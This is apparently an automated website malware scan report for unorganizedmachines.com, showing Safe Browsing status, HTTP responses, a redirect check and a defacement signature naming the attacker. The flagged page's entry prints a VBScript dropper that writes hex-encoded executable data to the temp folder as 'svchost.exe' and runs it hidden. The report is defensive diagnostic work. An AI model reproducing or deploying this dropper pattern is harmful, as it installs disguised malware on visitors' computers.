Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=unorganizedmachines.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.unorganizedmachines.com/ | HTTP/1.1 200 OK Connection: close Date: Fri, 06 Mar 2015 13:55:11 GMT Accept-Ranges: bytes ETag: "a3-461587fccff00" Server: Apache Vary: Accept-Encoding Content-Length: 163 Content-Type: text/html Last-Modified: Mon, 26 Jan 2009 01:17:16 GMT | clean |
http://www.unorganizedmachines.com/site | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 06 Mar 2015 13:55:12 GMT Location: http://www.unorganizedmachines.com/site/ Server: Apache Vary: Accept-Encoding Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.unorganizedmachines.com/site/ | 200 OK Content-Length: 115478 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: HackeD By Moh Ooasiic | fb.com/ooasiic | ooasiic@gmail.com <title>HackeD By Moh Ooasiic | fb.com/ooasiic | ooasiic@gmail.com </title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-9"/> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Hacked By Moh Ooasiic</title> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script> ...[115492 bytes skipped]... | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://www.unorganizedmachines.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: unorganizedmachines.com
Result:
GET / HTTP/1.1
Host: unorganizedmachines.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: unorganizedmachines.com
Referer: http://www.google.com/search?q=unorganizedmachines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: unorganizedmachines.com
Referer: http://www.google.com/search?q=unorganizedmachines.com
Result:
The result is similar to the first query. There are no suspicious redirects found.